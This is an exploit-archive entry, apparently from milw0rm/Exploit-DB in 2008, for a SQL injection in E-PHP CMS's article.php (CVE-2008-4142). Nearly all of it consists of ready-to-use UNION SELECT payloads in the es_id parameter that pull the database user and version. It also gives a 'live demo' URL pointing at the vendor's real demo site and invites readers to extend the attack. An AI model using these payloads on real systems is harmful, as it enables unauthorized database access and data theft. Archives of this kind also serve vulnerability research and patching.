EXPLOITS

E-PHP CMS - 'article.php' SQL Injection

Author: HaCkeR_EgY
type: webapps
platform: php
port: 
date_added: 2008-09-17  
date_updated: 2016-12-22  
verified: 1  
codes: OSVDB-48177;CVE-2008-4142  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 6483.txt  

############################################################
############# E-Php Content Management System ######################
## HaCker_Egy ;
## Contact : hacker_egy@hotmail.com
## Home : pal-hacker.com & atsdp.com
===============================================
# Script :  E-Php Content Management System
# Download : http://www.ephpscripts.com
===============================================
# Exploit :
           ==>> www.target.com/article.php?es_id=-1+union+select+1,current_user,3,4,5,6,7,8,9,10,11,12/*

     ==>> www.target.com/article.php?es_id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12/*

# live Demo :

    ==>> http://www.ephpscripts.com/demo/cms/article.php?es_id=-1+union+select+1,current_user,3,4,5,6,7,8,9,10,11,12/*

## Note : use your mind to get Full exploit D:

===============================================================
## GREETZ : Mr.SQL , GOLD_M , H-T Team , His0k4 , Dark , stack ,Mohamed el arab
===============================================================

# milw0rm.com [2008-09-18]